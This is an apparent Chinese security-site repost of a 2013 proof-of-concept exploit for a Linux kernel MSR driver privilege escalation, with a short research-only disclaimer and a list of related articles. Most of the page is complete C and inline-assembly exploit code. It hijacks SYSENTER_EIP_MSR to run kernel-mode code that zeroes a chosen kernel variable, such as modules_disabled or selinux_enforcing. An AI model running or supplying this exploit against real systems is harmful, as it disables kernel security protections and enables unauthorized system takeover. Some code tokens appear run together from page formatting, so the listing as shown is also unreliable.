Linux Kernel 'MSR' Driver Local Privilege Escalation
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
- // can do whatever in the commented area, re-enable module support, etc
- // requires CONFIG_X86_MSR and just uid 0
- // a small race exists between the time when the MSR is written to the first
- // time and when we issue our sysenter
- // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
- // configured to take a hex arg of a dword pointer to set to 0
- // (modules_disabled, selinux_enforcing, take your pick)
- //
- // Hello to Red Hat, who has shown yet again to not care until a
- // public exploit is released. Not even a bugtraq entry existed in
- // their system until this was published -- and they have a paid team
- // of how many?
- // It's not as if I didn't mention the problem and existence of an easy
- // exploit multiple times prior:
- // https://twitter.com/grsecurity/status/298977370776432640
- // https://twitter.com/grsecurity/status/297365303095078912
- // https://twitter.com/grsecurity/status/297189488638181376
- // https://twitter.com/grsecurity/status/297030133628416000
- // https://twitter.com/grsecurity/status/297029470072745984
- // https://twitter.com/grsecurity/status/297028324134359041
- //
- // spender 2013
- #define _GNU_SOURCE
- #include<stdio.h>
- #include<sched.h>
- #include<unistd.h>
- #include<sys/types.h>
- #include<sys/stat.h>
- #include<fcntl.h>
- #include<stdlib.h>
- #include<sys/time.h>
- #include<sys/resource.h>
- #include<sys/mman.h>
- #define SYSENTER_EIP_MSR 0x176
- u_int64_t msr;
- unsignedlong ourstack[65536];
- u_int64_t payload_data[16];
- externvoid*_ring0;
- externvoid*_ring0_end;
- void ring0(void)
- {
- __asm volatile(".globl _ring0\n"
- "_ring0:\n"
- ".intel_syntax noprefix\n"
- ".code64\n"
- // set up stack pointer with 'ourstack'
- "mov esp, ecx\n"
- // save registers, contains the original MSR value
- "push rax\n"
- "push rbx\n"
- "push rcx\n"
- "push rdx\n"
- // play with the kernel here with interrupts disabled!
- "mov rcx, qword ptr [rbx+8]\n"
- "test rcx, rcx\n"
- "jz skip_write\n"
- "mov dword ptr [rcx], 0\n"
- "skip_write:\n"
- // restore MSR value before returning
- "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
- "mov eax, dword ptr [rbx]\n"
- "mov edx, dword ptr [rbx+4]\n"
- "wrmsr\n"
- "pop rdx\n"
- "pop rcx\n"
- "pop rbx\n"
- "pop rax\n"
- "sti\n"
- "sysexit\n"
- ".code32\n"
- ".att_syntax prefix\n"
- ".global _ring0_end\n"
- "_ring0_end:\n"
- );
- }
- unsignedlong saved_stack;
- int main(int argc,char*argv[])
- {
- cpu_set_tset;
- int msr_fd;
- int ret;
- u_int64_t new_msr;
- struct sched_param sched;
- u_int64_t resolved_addr =0ULL;
- if(argc ==2)
- resolved_addr = strtoull(argv[1], NULL,16);
- /* can do this without privilege */
- mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
- mlock(&payload_data,sizeof(payload_data));
- CPU_ZERO(&set);
- CPU_SET(0,&set);
- sched.sched_priority =99;
- ret = sched_setscheduler(0, SCHED_FIFO,&sched);
- if(ret){
- fprintf(stderr,"Unable to set priority.\n");
- exit(1);
- }
- ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
- if(ret){
- fprintf(stderr,"Unable to set affinity.\n");
- exit(1);
- }
- msr_fd = open("/dev/cpu/0/msr", O_RDWR);
- if(msr_fd <0){
- msr_fd = open("/dev/msr0", O_RDWR);
- if(msr_fd <0){
- fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
- exit(1);
- }
- }
- lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
- ret = read(msr_fd,&msr,sizeof(msr));
- if(ret !=sizeof(msr)){
- fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
- exit(1);
- }
- // stuff some addresses in a buffer whose address we
- // pass to the "kernel" via register
- payload_data[0]= msr;
- payload_data[1]= resolved_addr;
- printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
- fflush(stdout);
- lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
- new_msr =(u_int64_t)(unsignedlong)&_ring0;
- printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
- fflush(stdout);
- ret = write(msr_fd,&new_msr,sizeof(new_msr));
- if(ret !=sizeof(new_msr)){
- fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
- exit(1);
- }
- __asm volatile(
- ".intel_syntax noprefix\n"
- ".code32\n"
- "mov saved_stack, esp\n"
- "lea ecx, ourstack\n"
- "lea edx, label2\n"
- "lea ebx, payload_data\n"
- "sysenter\n"
- "label2:\n"
- "mov esp, saved_stack\n"
- ".att_syntax prefix\n"
- );
- printf("Success.\n");
- return0;
- }
Linux Kernel 'MSR' Driver Local Privilege Escalation的更多相关文章
- karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850
catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...
- CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://ha ...
- Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞
漏洞名称: Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞 CNNVD编号: CNNVD-201311-390 发布时间: 2013-11-29 更 ...
- [转]Mac OS X local privilege escalation (IOBluetoothFamily)
Source: http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowad ...
- Linux Kernel ---- PCI Driver 分析
自己笔记使用. Kernel 版本 4.15.0 (ubuntu 18.04,intel skylake) 最近想学习VGA驱动去了解 DDCCP / EDID 等协议,然后顺便了解下驱动是如何工作的 ...
- [EXP]Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)
#include "stdafx.h" #include <Windows.h> #include "resource.h" void DropRe ...
- OSCP Learning Notes - Privilege Escalation
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...
- ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)
ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...
- Linux Kernel - Debug Guide (Linux内核调试指南 )
http://blog.csdn.net/blizmax6/article/details/6747601 linux内核调试指南 一些前言 作者前言 知识从哪里来 为什么撰写本文档 为什么需要汇编级 ...
随机推荐
- iOS 数据持久化(1):属性列表与对象归档
@import url(http://i.cnblogs.com/Load.ashx?type=style&file=SyntaxHighlighter.css); @import url(/ ...
- iOS Sqlite3 Demo 及 FMDB Demo
本文是主要实现了三个函数: testSQLite3 是测试系统自带的sqlite3的demo testFMDB是测试FMDB存取简单的数据类型的 的demo testFMDB2是将任意对象作为一个整体 ...
- sql 减去分钟
SQL SERVER:SELECT DATEADD( minute,-10,GETDATE()) ORACLE:SELECT to_char(sysdate -interval '10' minute ...
- 查询可用的Nuget服务地址
解决访问Nuget源失败问题 查询IP址址 nslookup nuget.org 如失败,通过google 的dns服务器查询 nslookup nuget.org 8.8.8.8 将得到的Ip地址加 ...
- EntityFrameowk6.1 使用enum和低版本的不同
原有项目中使用EF5.0 实体类 public partial class Log : BaseEntity { public Nullable<int> LogLevelId { get ...
- android SDK 代理配置(东北大学)
启动 Android SDK Manager ,打开主界面,依次选择「Tools」.「Options...」,弹出『Android SDK Manager - Settings』窗口: 在『Andro ...
- Core Data 教学
看了一篇国外的文章,关于iOS9的Core Data教学,在这里做了一下总结 Core Data 教学 示例开源地址:LastDayCoreData 在这篇文章中我们将学习Core Data的系列教程 ...
- iOS9适配中出现的一些常见问题
本文主要是说一些iOS9适配中出现的坑,如果只是要单纯的了解iOS9新特性可以看瞄神的开发者所需要知道的 iOS 9 SDK 新特性.9月17日凌晨,苹果给用户推送了iOS9正式版,随着有用户陆续升级 ...
- ie67 设置最小宽度最小高度
1.最小宽度 min-width:1003px; _width:expression((document.documentElement.clientWidth||document.body.clie ...
- IOI1994 北京2008的挂钟 迭代加深
总的来讲,这是一道很⑨的题,因为: (1)题目中有⑨个挂钟 (2)有⑨种操作方案 (3)这题因为解空间太小所以可以直接⑨重循环!! 这题可以用迭代加深搜索高效求解,剪枝的策略也很显然: >所求的 ...